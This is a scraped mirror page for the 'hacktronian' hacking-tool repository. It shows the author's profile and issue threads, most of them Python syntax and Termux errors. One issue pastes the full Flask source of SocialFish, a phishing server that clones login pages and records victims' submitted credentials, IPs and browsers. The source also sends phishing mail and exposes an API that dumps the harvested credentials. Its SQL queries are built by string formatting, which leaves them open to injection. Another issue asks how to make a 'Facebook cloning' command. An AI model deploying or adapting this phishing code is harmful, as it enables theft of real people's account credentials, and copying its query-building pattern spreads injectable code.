Giter Site home page Giter Site logo

hacktronian's Introduction

Visitors Open Source Love

Mr.SAGE

  • ๐Ÿ‘จ๐Ÿฝโ€๐Ÿ’ป Iโ€™m a Freelancer & Cybersecurity Enthusiast

  • ๐Ÿค๐Ÿฝ Looking for VAPT & Web Development Projects

  • ๐ŸŽฒ Interests : CTF & Web Designing

  • ๐Ÿ‘พ Discord : Mr.Sฮ›Gฮฃ#9779

  • ๐ŸŽฎ League of Legends : Mr SAGE #1337

  • ๐Ÿ“ง Contact Me : [email protected]

  • โšก Eat ๐Ÿ” Sleep ๐Ÿ˜ด Hack ๐Ÿ’ป Repeat ๐Ÿ”

๐Ÿ‘จ๐Ÿฝโ€๐Ÿ’ป Skills & Tools

๐Ÿ’ป Services

๐ŸŒ Resources

๐Ÿ’ฌ Social Links

Portfolio Hacktronian Instagram Twitter YouTube Whatsapp Telegram HTB THM

hacktronian's People

Contributors

thehackingsage avatar umair9747 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

hacktronian's Issues

errors

a number oof error in your tool . i try to to use it in termux . i fix them. please update tool for other.

Hurts my eyes

As a developer who developes websites, cyber weapons, and even AI this code hurt my eyes, i think it can be done way WAY better for one

WHY

os.system('clear')
os.system('clear')
os.system('clear')
os.system('clear')

then again uptop and through the entire script i see
os.system('clear')
os.system('clear')
os.system('clear')
os.system('clear')

multiple times with no end even though you have an entire function for clearing the screen already, this annoys me the most about developers i hate looking at code and seeing os.system and time.sleep statements over and over and over and over through the entire script

no need for that much system clear statements in one brick of code

SyntaxError: invalid syntax

Hello there,

I have installed the script on my termux and when trying to run it using this command
cd hacktronian && python hacktronian.py

i got the following error

File "hacktronian.py", line 90
"""
^
SyntaxError: invalid syntax

Screenshot_2018_09_06_02_00_40_143

Ggm

#!/usr/bin/env python3

from flask import Flask, request, render_template, jsonify, redirect, g, flash
from core.config import *
from core.view import head
from core.scansf import nScan
from core.clonesf import clone
from core.dbsf import initDB
from core.genToken import genToken, genQRCode
from core.sendMail import sendMail
from core.tracegeoIp import tracegeoIp
from core.cleanFake import cleanFake
from core.genReport import genReport
from core.report import generate_unique #>> new line
from datetime import date
from sys import argv, exit, version_info
import colorama
import sqlite3
import flask_login
import os

Verificar argumentos

if len(argv) < 2:
print("./SocialFish \n\ni.e.: ./SocialFish.py root pass")
exit(0)

Temporario

users = {argv[1]: {'password': argv[2]}}

Definicoes do flask

app = Flask(name, static_url_path='',
static_folder='templates/static')
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0

Inicia uma conexao com o banco antes de cada requisicao

@app.before_request
def before_request():
g.db = sqlite3.connect(DATABASE)

Finaliza a conexao com o banco apos cada conexao

@app.teardown_request
def teardown_request(exception):
if hasattr(g, 'db'):
g.db.close()

Conta o numero de credenciais salvas no banco

def countCreds():
count = 0
cur = g.db
select_all_creds = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc")
for i in select_all_creds:
count += 1
return count

Conta o numero de visitantes que nao foram pegos no phishing

def countNotPickedUp():
count = 0

cur = g.db
select_clicks = cur.execute("SELECT clicks FROM socialfish where id = 1")

for i in select_clicks:
    count = i[0]

count = count - countCreds()
return count

#----------------------------------------

definicoes do flask e de login

app.secret_key = APP_SECRET_KEY
login_manager = flask_login.LoginManager()
login_manager.init_app(app)

class User(flask_login.UserMixin):
pass

@login_manager.user_loader
def user_loader(email):
if email not in users:
return

user = User()
user.id = email
return user

@login_manager.request_loader
def request_loader(request):
email = request.form.get('email')
if email not in users:
return

user = User()
user.id = email
user.is_authenticated = request.form['password'] == users[email]['password']

return user

---------------------------------------------------------------------------------------

Rota para o caminho de inicializacao, onde e possivel fazer login

@app.route('/neptune', methods=['GET', 'POST'])
def admin():
# se a requisicao for get
if request.method == 'GET':
# se o usuario estiver logado retorna para a pagina de credenciais
if flask_login.current_user.is_authenticated:
return redirect('/creds')
# caso contrario retorna para a pagina de login
else:
return render_template('signin.html')

# se a requisicao for post, verifica-se as credencias
if request.method == 'POST':
    email = request.form['email']
    try:
        # caso sejam corretas
        if request.form['password'] == users[email]['password']:
            user = User()
            user.id = email
            # torna autentico
            flask_login.login_user(user)
            # retorna acesso a pagina restrita
            return redirect('/creds')
        # contrario retorna erro
        else:
            # temporario
            return "bad"
    except:
        return "bad"

funcao onde e realizada a renderizacao da pagina para a vitima

@app.route("/")
def getLogin():
# caso esteja configurada para clonar, faz o download da pagina utilizando o user-agent do visitante
if sta == 'clone':
agent = request.headers.get('User-Agent').encode('ascii', 'ignore').decode('ascii')
clone(url, agent, beef)
o = url.replace('://', '-')
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 where id = 1")
g.db.commit()
template_path = 'fake/{}/{}/index.html'.format(agent, o)
return render_template(template_path)
# caso seja a url padrao
elif url == 'https://github.com/UndeadSec/SocialFish':
return render_template('default.html')
# caso seja configurada para custom
else:
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 where id = 1")
g.db.commit()
return render_template('custom.html')

funcao onde e realizado o login por cada pagina falsa

@app.route('/login', methods=['POST'])
def postData():
if request.method == "POST":
fields = [k for k in request.form]
values = [request.form[k] for k in request.form]
data = dict(zip(fields, values))
browser = str(request.user_agent.browser)
bversion = str(request.user_agent.version)
platform = str(request.user_agent.platform)
rip = str(request.remote_addr)
d = "{:%m-%d-%Y}".format(date.today())
cur = g.db
sql = "INSERT INTO creds(url,jdoc,pdate,browser,bversion,platform,rip) VALUES(?,?,?,?,?,?,?)"
creds = (url, str(data), d, browser, bversion, platform, rip)
cur.execute(sql, creds)
g.db.commit()
return redirect(red)

funcao para configuracao do funcionamento CLONE ou CUSTOM, com BEEF ou NAO

@app.route('/configure', methods=['POST'])
def echo():
global url, red, sta, beef
red = request.form['red']
sta = request.form['status']
beef = request.form['beef']

if sta == 'clone':
    url = request.form['url']
else:
    url = 'Custom'

if len(url) > 4 and len(red) > 4:
    if 'http://' not in url and sta != '1' and 'https://' not in url:
        url = 'http://' + url
    if 'http://' not in red and 'https://' not in red:
        red = 'http://' + red
else:
    url = 'https://github.com/UndeadSec/SocialFish'
    red = 'https://github.com/UndeadSec/SocialFish'
cur = g.db
cur.execute("UPDATE socialfish SET attacks = attacks + 1 where id = 1")
g.db.commit()
return redirect('/creds')

pagina principal do dashboard

@app.route("/creds")
@flask_login.login_required
def getCreds():
cur = g.db
attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
data = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc").fetchall()
return render_template('admin/index.html', data=data, clicks=clicks, countCreds=countCreds, countNotPickedUp=countNotPickedUp, attacks=attacks, tokenapi=tokenapi)

pagina para envio de emails

@app.route("/mail", methods=['GET', 'POST'])
@flask_login.login_required
def getMail():
if request.method == 'GET':
cur = g.db
email = cur.execute("SELECT email FROM sfmail where id = 1").fetchone()[0]
smtp = cur.execute("SELECT smtp FROM sfmail where id = 1").fetchone()[0]
port = cur.execute("SELECT port FROM sfmail where id = 1").fetchone()[0]
return render_template('admin/mail.html', email=email, smtp=smtp, port=port)
if request.method == 'POST':
subject = request.form['subject']
email = request.form['email']
password = request.form['password']
recipient = request.form['recipient']
body = request.form['body']
smtp = request.form['smtp']
port = request.form['port']
sendMail(subject, email, password, recipient, body, smtp, port)
cur = g.db
cur.execute("UPDATE sfmail SET email = '{}' where id = 1".format(email))
cur.execute("UPDATE sfmail SET smtp = '{}' where id = 1".format(smtp))
cur.execute("UPDATE sfmail SET port = '{}' where id = 1".format(port))
g.db.commit()
return redirect('/mail')

Rota para consulta de log

@app.route("/single/", methods=['GET'])
@flask_login.login_required
def getSingleCred(id):
try:
sql = "SELECT jdoc FROM creds where id = {}".format(id)
cur = g.db
credInfo = cur.execute(sql).fetchall()
if len(credInfo) > 0:
return render_template('admin/singlecred.html', credInfo=credInfo)
else:
return "Not found"
except:
return "Bad parameter"

rota para rastreio de ip

@app.route("/trace/", methods=['GET'])
@flask_login.login_required
def getTraceIp(ip):
try:
traceIp = tracegeoIp(ip)
return render_template('admin/traceIp.html', traceIp=traceIp, ip=ip)
except:
return "Network Error"

rota para scan do nmap

@app.route("/scansf/", methods=['GET'])
@flask_login.login_required
def getScanSf(ip):
return render_template('admin/scansf.html', nScan=nScan, ip=ip)

rota post para revogar o token da api

@app.route("/revokeToken", methods=['POST'])
@flask_login.login_required
def revokeToken():
revoke = request.form['revoke']
if revoke == 'yes':
cur = g.db
upsql = "UPDATE socialfish SET token = '{}' where id = 1".format(genToken())
cur.execute(upsql)
g.db.commit()
token = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
genQRCode(token, revoked=True)
return redirect('/creds')

pagina para gerar relatorios

@app.route("/report", methods=['GET', 'POST'])
@flask_login.login_required
def getReport():
if request.method == 'GET':
cur = g.db
urls = cur.execute("SELECT DISTINCT url FROM creds").fetchall()
users = cur.execute("SELECT name FROM professionals").fetchall()
companies = cur.execute("SELECT name FROM companies").fetchall()
uniqueUrls = []
for u in urls:
if u not in uniqueUrls:
uniqueUrls.append(u[0])
return render_template('admin/report.html', uniqueUrls=uniqueUrls, users=users, companies=companies)
if request.method == 'POST':
subject = request.form['subject']
user = request.form['selectUser']
company = request.form['selectCompany']
date_range = request.form['datefilter']
target = request.form['selectTarget']
_target = 'All' if target=='0' else target
genReport(DATABASE, subject, user, company, date_range, _target)
generate_unique(DATABASE,_target)
return redirect('/report')

pagina para cadastro de profissionais

@app.route("/professionals", methods=['GET', 'POST'])
@flask_login.login_required
def getProfessionals():
if request.method == 'GET':
return render_template('admin/professionals.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
obs = request.form['obs']
sql = "INSERT INTO professionals(name,email,obs) VALUES(?,?,?)"
info = (name, email, obs)
cur = g.db
cur.execute(sql, info)
g.db.commit()
return redirect('/professionals')

pagina para cadastro de empresas

@app.route("/companies", methods=['GET', 'POST'])
@flask_login.login_required
def getCompanies():
if request.method == 'GET':
return render_template('admin/companies.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
phone = request.form['phone']
address = request.form['address']
site = request.form['site']
sql = "INSERT INTO companies(name,email,phone,address,site) VALUES(?,?,?,?,?)"
info = (name, email, phone, address, site)
cur = g.db
cur.execute(sql, info)
g.db.commit()
return redirect('/companies')

rota para gerenciamento de usuarios

@app.route("/sfusers/", methods=['GET'])
@flask_login.login_required
def getSfUsers():
return render_template('admin/sfusers.html')

#--------------------------------------------------------------------------------------------------------------------------------
#LOGIN VIEWS

@app.route('/logout')
def logout():
flask_login.logout_user()
return 'Logged out'

@login_manager.unauthorized_handler
def unauthorized_handler():
return 'Unauthorized'

#--------------------------------------------------------------------------------------------------------------------------------

MOBILE API

VERIFICAR CHAVE

@app.route("/api/checkKey/", methods=['GET'])
def checkKey(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
status = {'status':'ok'}
else:
status = {'status':'bad'}
return jsonify(status)

@app.route("/api/statistics/", methods=['GET'])
def getStatics(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
cur = g.db
attacks = cur.execute("SELECT attacks FROM socialfish where id = 1").fetchone()[0]
clicks = cur.execute("SELECT clicks FROM socialfish where id = 1").fetchone()[0]
countC = countCreds()
countNPU = countNotPickedUp()
info = {'status':'ok','attacks':attacks, 'clicks':clicks, 'countCreds':countC, 'countNotPickedUp':countNPU}
else:
info = {'status':'bad'}
return jsonify(info)

@app.route("/api/getJson/", methods=['GET'])
def getJson(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
try:
sql = "SELECT * FROM creds"
cur = g.db
credInfo = cur.execute(sql).fetchall()
listCreds = []
if len(credInfo) > 0:
for c in credInfo:
cred = {'id':c[0],'url':c[1], 'post':c[2], 'date':c[3], 'browser':c[4], 'version':c[5],'os':c[6],'ip':c[7]}
listCreds.append(cred)
else:
credInfo = {'status':'nothing'}
return jsonify(listCreds)
except:
return "Bad parameter"
else:
credInfo = {'status':'bad'}
return jsonify(credInfo)

@app.route('/api/configure', methods = ['POST'])
def postConfigureApi():
global url, red, sta, beef
if request.is_json:
content = request.get_json()
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if content['key'] == tokenapi:
red = content['red']
beef = content['beef']
if content['sta'] == 'clone':
sta = 'clone'
url = content['url']
else:
sta = 'custom'
url = 'Custom'

        if url != 'Custom':
            if len(url) > 4:
                if 'http://' not in url and sta != '1' and 'https://' not in url:
                    url = 'http://' + url
        if len(red) > 4:
            if 'http://' not in red and 'https://' not in red:
                red = 'http://' + red
        else:
            red = 'https://github.com/UndeadSec/SocialFish'
        cur = g.db
        cur.execute("UPDATE socialfish SET attacks = attacks + 1 where id = 1")
        g.db.commit()
        status = {'status':'ok'}
    else:
        status = {'status':'bad'}
else:
    status = {'status':'bad'}
return jsonify(status)

@app.route("/api/mail", methods=['POST'])
def postSendMail():
if request.is_json:
content = request.get_json()
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if content['key'] == tokenapi:
subject = content['subject']
email = content['email']
password = content['password']
recipient = content['recipient']
body = content['body']
smtp = content['smtp']
port = content['port']
if sendMail(subject, email, password, recipient, body, smtp, port) == 'ok':
cur = g.db
cur.execute("UPDATE sfmail SET email = '{}' where id = 1".format(email))
cur.execute("UPDATE sfmail SET smtp = '{}' where id = 1".format(smtp))
cur.execute("UPDATE sfmail SET port = '{}' where id = 1".format(port))
g.db.commit()
status = {'status':'ok'}
else:
status = {'status':'bad','error':str(sendMail(subject, email, password, recipient, body, smtp, port))}
else:
status = {'status':'bad'}
else:
status = {'status':'bad'}
return jsonify(status)

@app.route("/api/trace//", methods=['GET'])
def getTraceIpMob(key, ip):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
try:
traceIp = tracegeoIp(ip)
return jsonify(traceIp)
except:
content = {'status':'bad'}
return jsonify(content)
else:
content = {'status':'bad'}
return jsonify(content)

@app.route("/api/scansf//", methods=['GET'])
def getScanSfMob(key, ip):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
return jsonify(nScan(ip))
else:
content = {'status':'bad'}
return jsonify(content)

@app.route("/api/infoReport/", methods=['GET'])
def getReportMob(key):
cur = g.db
tokenapi = cur.execute("SELECT token FROM socialfish where id = 1").fetchone()[0]
if key == tokenapi:
urls = cur.execute("SELECT url FROM creds").fetchall()
users = cur.execute("SELECT name FROM professionals").fetchall()
comp = cur.execute("SELECT name FROM companies").fetchall()
uniqueUrls = []
professionals = []
companies = []
for c in comp:
companies.append(c[0])
for p in users:
professionals.append(p[0])
for u in urls:
if u not in uniqueUrls:
uniqueUrls.append(u[0])
info = {'urls':uniqueUrls,'professionals':professionals, 'companies':companies}
return jsonify(info)
else:
return jsonify({'status':'bad'})

#--------------------------------------------------------------------------------------------------------------------------------
def main():
if version_info<(3,0,0):
print('[!] Please use Python 3. $ python3 SocialFish.py')
exit(0)
head()
cleanFake()
# Inicia o banco
initDB(DATABASE)
app.run(host="0.0.0.0", port=5000)

if name == "main":
try:
main()
except KeyboardInterrupt:
exit(0)

Hi

Thaks you for traning

Hey

Please share a file

Help

Hello sir
I need your help how can I create a termux command for Facebook cloning

SyntaxError: invalid syntax

Hello there,

I have installed the script on my Manjaro Linux and when trying to run it using this command
hacktorian

i got the following error

Screenshot_20200326_091712

Permisson denied error even in root mode

I'm root user in termux but I can't execute fluxion.sh with this error:
127|on5xelte:/data/data/com.termux/files/home/hacktronian/Fluxion # ./fluxion.sh /system/bin/sh: ./fluxion.sh: can't execute: Permission denied

Copyright

Bro, since you have attached MIT license with it. I'm using your code on behalf of me on Github

i'm just asking - can i use it?

SyntaxError?

โ”Œโ”€[warloxian@asus705-linux]โ”€[~/hacktronian]
โ””โ”€โ”€โ•ผ $sudo hacktronian
File "/usr/share/doc/hacktronian/hacktronian.py", line 82
print """
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(""")?

This happens if i run just hacktronian or sudo hacktronian on Parrot sec

Not working on Kali Linux (Running on a RPI 2W) "SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?"

[!] This Tool Must Run As ROOT [!]

[>] Press ENTER to Install Hacktronian, CTRL+C to Abort.

[โœ”] Checking directories...
[!] A Directory hacktronian Was Found.. Do You Want To Replace It ? [y/n]:
y
[โœ”] Installing ...

Cloning into '/usr/share/doc/hacktronian'...
remote: Enumerating objects: 190, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 190 (delta 4), reused 10 (delta 0), pack-reused 175
Receiving objects: 100% (190/190), 199.08 KiB | 227.00 KiB/s, done.
Resolving deltas: 100% (103/103), done.

[โœ”] Successfuly Installed !!! [โœ”]

[โœ”]========================================================================[โœ”]
[โœ”] โœ”โœ”โœ” All Is Done!! you can execute tool by typing hacktronian !! โœ”โœ”โœ” [โœ”]
[โœ”]========================================================================[โœ”]

โ”Œโ”€โ”€(rootใ‰ฟkali-raspberry-pi-zero-2-w)-[/home/kali/hacktronian]
โ””โ”€# hacktronian
File "/usr/share/doc/hacktronian/hacktronian.py", line 82
print """
^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

Not working.

(Debian Wheezy (iphoneos-arm))
I did python2 hacktronian.py
Then I saw this:
_File "hacktronian.py", line 12, in ย 
import argparse ย 
File "/usr/lib/python2.7/argparse.py", line 85, in ย 
import collections as _collections ย 
File "/usr/lib/python2.7/collections.py", line 20, in ย 
from collections import deque, defaultdict ย 
ImportError: dynamic module does not define init function (init_collections)

Eh, idk

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.